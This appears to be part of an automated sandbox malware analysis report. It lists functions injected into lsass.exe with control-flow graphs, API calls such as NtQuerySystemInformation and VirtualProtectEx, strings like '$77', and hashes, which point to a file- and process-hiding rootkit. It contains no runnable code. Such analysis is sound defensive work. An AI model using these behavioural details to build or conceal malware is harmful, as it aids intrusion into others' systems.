                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5 213bdce27d4-213bdce2858 NtQueryDirectoryFileEx 6 213bdce285e-213bdce2861 5->6 7 213bdce2a7c-213bdce2a9f 5->7 6->7 8 213bdce2867-213bdce2875 6->8 8->7 9 213bdce287b-213bdce28c1 call 213bdcf3ea0 * 3 GetFileType 8->9 16 213bdce28d9-213bdce28e3 call 213bdce1ad0 9->16 17 213bdce28c3-213bdce28d7 StrCpyW 9->17 18 213bdce28e8-213bdce28ec 16->18 17->18 20 213bdce28f2-213bdce28f7 18->20 21 213bdce29d9-213bdce29f2 call 213bdce353c call 213bdce3d4c 18->21 23 213bdce28fa-213bdce28ff 20->23 34 213bdce2989-213bdce29d3 21->34 35 213bdce29f4-213bdce2a23 call 213bdce353c call 213bdce34d8 call 213bdce1dd0 21->35 25 213bdce2901-213bdce2904 23->25 26 213bdce291c 23->26 25->26 29 213bdce2906-213bdce2909 25->29 27 213bdce291f-213bdce2938 call 213bdce353c call 213bdce3d4c 26->27 43 213bdce293e-213bdce296d call 213bdce353c call 213bdce34d8 call 213bdce1dd0 27->43 44 213bdce2a2b-213bdce2a2d 27->44 29->26 32 213bdce290b-213bdce290e 29->32 32->26 36 213bdce2910-213bdce2913 32->36 34->7 34->21 35->34 60 213bdce2a29 35->60 36->26 39 213bdce2915-213bdce291a 36->39 39->26 39->27 43->44 66 213bdce2973-213bdce297e 43->66 48 213bdce2a2f-213bdce2a49 44->48 49 213bdce2a4e-213bdce2a51 44->49 48->23 50 213bdce2a5b-213bdce2a5e 49->50 51 213bdce2a53-213bdce2a59 49->51 54 213bdce2a60-213bdce2a63 50->54 55 213bdce2a79 50->55 51->7 54->55 58 213bdce2a65-213bdce2a68 54->58 55->7 58->55 61 213bdce2a6a-213bdce2a6d 58->61 60->7 61->55 63 213bdce2a6f-213bdce2a72 61->63 63->55 65 213bdce2a74-213bdce2a77 63->65 65->7 65->55 66->23 67 213bdce2984 66->67 67->7
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryQueryType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 4175507832-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 3d26f4e96233d816744d82a11ef1c138f2a041977b4f6f17d2ba281c401817ef
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 5071B472208B8953EF34DE2698483EAA796F3AD78CF550136DE4947789FE36D7058700
                                                                                                                                  Function 00000213BDCE2214 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162nativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 68 213bdce2214-213bdce224e NtQuerySystemInformation 69 213bdce2250-213bdce2254 68->69 70 213bdce2257-213bdce225a 68->70 69->70 71 213bdce2260-213bdce2263 70->71 72 213bdce240b-213bdce242b 70->72 73 213bdce235b-213bdce235e 71->73 74 213bdce2269-213bdce227b 71->74 75 213bdce23cf-213bdce23d2 73->75 76 213bdce2360-213bdce237a call 213bdce3398 73->76 74->72 77 213bdce2281-213bdce228d 74->77 75->72 81 213bdce23d4-213bdce23e7 call 213bdce3398 75->81 76->72 86 213bdce2380-213bdce2396 76->86 79 213bdce228f-213bdce229f 77->79 80 213bdce22bb-213bdce22c6 call 213bdce1cc0 77->80 79->80 83 213bdce22a1-213bdce22b9 StrCmpNIW 79->83 87 213bdce22e7-213bdce22f9 80->87 94 213bdce22c8-213bdce22e0 call 213bdce1d2c 80->94 81->72 93 213bdce23e9-213bdce23f1 81->93 83->80 83->87 86->72 92 213bdce2398-213bdce23b4 86->92 90 213bdce22fb-213bdce22fd 87->90 91 213bdce2309-213bdce230b 87->91 95 213bdce22ff-213bdce2302 90->95 96 213bdce2304-213bdce2307 90->96 97 213bdce2312 91->97 98 213bdce230d-213bdce2310 91->98 99 213bdce23b8-213bdce23cb 92->99 93->72 100 213bdce23f3-213bdce23fb 93->100 94->87 108 213bdce22e2-213bdce22e5 94->108 102 213bdce2315-213bdce2318 95->102 96->102 97->102 98->102 99->99 103 213bdce23cd 99->103 104 213bdce23fe-213bdce2409 100->104 106 213bdce231a-213bdce2320 102->106 107 213bdce2326-213bdce2329 102->107 103->72 104->72 104->104 106->77 106->107 107->72 109 213bdce232f-213bdce2333 107->109 108->102 110 213bdce234a-213bdce2356 109->110 111 213bdce2335-213bdce2338 109->111 110->72 111->72 112 213bdce233e-213bdce2343 111->112 112->109 113 213bdce2345 112->113 113->72
                                                                                                                                  APIs
                                                                                                                                  • NtQuerySystemInformation.NTDLL ref: 00000213BDCE223F
                                                                                                                                  • StrCmpNIW.SHLWAPI ref: 00000213BDCE22AE
                                                                                                                                    • Part of subcall function 00000213BDCE3398: GetProcessHeap.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE33BB
                                                                                                                                    • Part of subcall function 00000213BDCE3398: HeapAlloc.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE33CE
                                                                                                                                    • Part of subcall function 00000213BDCE3398: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE3443
                                                                                                                                    • Part of subcall function 00000213BDCE3398: GetProcessHeap.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE34A9
                                                                                                                                    • Part of subcall function 00000213BDCE3398: HeapFree.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE34B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                                                                                  • String ID: $77$S
                                                                                                                                  • API String ID: 722747020-3174149180
                                                                                                                                  • Opcode ID: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
                                                                                                                                  • Instruction ID: b03782096289f2a850eff6b5594ec020bd9c9ac6fc2f8c2e5cc3fd53152fcd47
                                                                                                                                  • Opcode Fuzzy Hash: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
                                                                                                                                  • Instruction Fuzzy Hash: 7751B2B2B14A2883EF60CF21D448BEDA3A6F72879CF044121DE0657B45EB36EB52C700
                                                                                                                                  Function 00000213BDCE1AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: d06895fa276b780de0963ea568b078f0b60c848c687486bd70a92498e7706ae6
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: F6F031B231868592EF20CF25E9987D96762F764B8CF845020DA4946598EA7ECB5CC700
                                                                                                                                  Function 00000213BDCE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: f0c05ff4b6a3c183fa54b17e78690c58b10f56ad85a1d34e7c37175fa386ebdf
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: 24E0ED7162154086EB08DB62D80C2D97BA2FB98B1DF45D024CA090B318EF399A9D8610
                                                                                                                                  Function 00000213BDCE37EC Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00000213BDCE3805
                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 00000213BDCE3814
                                                                                                                                    • Part of subcall function 00000213BDCE3D4C: StrCmpNIW.SHLWAPI(?,?,?,00000213BDCE2722), ref: 00000213BDCE3D64
                                                                                                                                    • Part of subcall function 00000213BDCE3C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CA6
                                                                                                                                    • Part of subcall function 00000213BDCE3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CD4
                                                                                                                                    • Part of subcall function 00000213BDCE3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CF6
                                                                                                                                    • Part of subcall function 00000213BDCE3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3D11
                                                                                                                                    • Part of subcall function 00000213BDCE3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3D32
                                                                                                                                  • CreateThread.KERNELBASE ref: 00000213BDCE385B
                                                                                                                                    • Part of subcall function 00000213BDCE1E38: GetCurrentThread.KERNEL32 ref: 00000213BDCE1E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: 6f22da76264932056b23ab409b367e06aaa2eed78d6e5fe9efdbc6982ddf3388
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: 9C1140B0A2CB4843FF70D765A41D3D956A3BBB438EF40423A954686194FF7BF7588600
                                                                                                                                  Function 00000213BDCB2C8C Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: c3bcac0436af319acd82c5a0eb2dd64a2b81e7aede921fd794e88c02fc727a49
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: 97911672B451A887DF64CF25D008BADB792F764B9DF548124EE4907B88EA39DA13C710
                                                                                                                                  Function 00000213BDCE1BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00000213BDCE1724: GetProcessHeap.KERNEL32 ref: 00000213BDCE172F
                                                                                                                                    • Part of subcall function 00000213BDCE1724: HeapAlloc.KERNEL32 ref: 00000213BDCE173E
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17AE
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17DB
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE17F5
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1815
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1830
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1850
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE186B
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE188B
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE18A6
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE18C6
                                                                                                                                  • SleepEx.KERNELBASE ref: 00000213BDCE1BDB
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE18E1
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1901
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE191C
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE193C
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1957
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1977
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE1992
                                                                                                                                    • Part of subcall function 00000213BDCE1724: RegCloseKey.ADVAPI32 ref: 00000213BDCE199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: 6742bfce0cefe3a022eb4697f3d9c53f66ca175f2202356dc32e17777e7f7e79
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 2531FDF520864943EF51DB26D9483ED53A6ABA4BCCF0474318E0AC7295FE32EBB09310

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00000213BDCE2DD0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252stringlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 310 213bdce2dd0-213bdce2e49 312 213bdce2e4f-213bdce2e55 310->312 313 213bdce3154-213bdce3177 310->313 312->313 314 213bdce2e5b-213bdce2e5e 312->314 314->313 315 213bdce2e64-213bdce2e67 314->315 315->313 316 213bdce2e6d-213bdce2e7d GetModuleHandleA 315->316 317 213bdce2e91 316->317 318 213bdce2e7f-213bdce2e8f GetProcAddress 316->318 319 213bdce2e94-213bdce2eb2 317->319 318->319 319->313 321 213bdce2eb8-213bdce2ed7 StrCmpNIW 319->321 321->313 322 213bdce2edd-213bdce2ee1 321->322 322->313 323 213bdce2ee7-213bdce2ef1 322->323 323->313 324 213bdce2ef7-213bdce2efe 323->324 324->313 325 213bdce2f04-213bdce2f17 324->325 326 213bdce2f19-213bdce2f25 325->326 327 213bdce2f27 325->327 328 213bdce2f2a-213bdce2f2e 326->328 327->328 329 213bdce2f30-213bdce2f3c 328->329 330 213bdce2f3e 328->330 331 213bdce2f41-213bdce2f4b 329->331 330->331 332 213bdce3031-213bdce3035 331->332 333 213bdce2f51-213bdce2f54 331->333 334 213bdce303b-213bdce303e 332->334 335 213bdce3146-213bdce314e 332->335 336 213bdce2f66-213bdce2f70 333->336 337 213bdce2f56-213bdce2f63 call 213bdce1a30 333->337 338 213bdce304f-213bdce3059 334->338 339 213bdce3040-213bdce304c call 213bdce1a30 334->339 335->313 335->325 341 213bdce2f72-213bdce2f7f 336->341 342 213bdce2fa4-213bdce2fae 336->342 337->336 346 213bdce305b-213bdce3068 338->346 347 213bdce3089-213bdce308c 338->347 339->338 341->342 349 213bdce2f81-213bdce2f8e 341->349 343 213bdce2fb0-213bdce2fbd 342->343 344 213bdce2fde-213bdce2fe1 342->344 343->344 351 213bdce2fbf-213bdce2fcc 343->351 353 213bdce2fef-213bdce2ffc lstrlenW 344->353 354 213bdce2fe3-213bdce2fed call 213bdce1cc0 344->354 346->347 355 213bdce306a-213bdce3077 346->355 356 213bdce308e-213bdce3097 call 213bdce1cc0 347->356 357 213bdce3099-213bdce30a6 lstrlenW 347->357 350 213bdce2f91-213bdce2f97 349->350 358 213bdce2f9d-213bdce2fa2 350->358 359 213bdce3027-213bdce302c 350->359 362 213bdce2fcf-213bdce2fd5 351->362 365 213bdce300f-213bdce3021 call 213bdce3d4c 353->365 366 213bdce2ffe-213bdce300d call 213bdce1cf8 353->366 354->353 354->359 364 213bdce307a-213bdce3080 355->364 356->357 376 213bdce30ca-213bdce30d5 356->376 360 213bdce30b9-213bdce30c3 call 213bdce3d4c 357->360 361 213bdce30a8-213bdce30b7 call 213bdce1cf8 357->361 358->342 358->350 370 213bdce30c6-213bdce30c8 359->370 360->370 361->360 361->376 362->359 373 213bdce2fd7-213bdce2fdc 362->373 375 213bdce3082-213bdce3087 364->375 364->376 365->359 365->370 366->359 366->365 370->335 370->376 373->344 373->362 375->347 375->364 381 213bdce3140-213bdce3144 376->381 382 213bdce30d7-213bdce30f7 call 213bdcf3800 376->382 381->335 386 213bdce30f9-213bdce3117 call 213bdcf3800 382->386 387 213bdce311a-213bdce311d 382->387 386->387 387->381 388 213bdce311f-213bdce313d call 213bdcf3800 387->388 388->381
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 3153948470-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: 9cafec5d88997d93dc954b4a66366b768a2dbfbf91637755cf3b3b2cd94444a2
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: ECA1A1B2218A9882EF54CF25D4487D9A3A6FB64B8DF045026EE0997794FF36EF44C340
                                                                                                                                  Function 00000213BDCE8270 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: a1d03c42cce580e1748026c280aa21f99e469885c200b3bd280bed96587a3bdc
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: A9312772218B808AEB64CF60E8843EE7766F79470CF44452ADB4E47B99EF39C7498714
                                                                                                                                  Function 00000213BDCECB40 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: e0269caf7bd19dfda3f04994f19a542505f616c6e681d52d24d15451c6824a1b
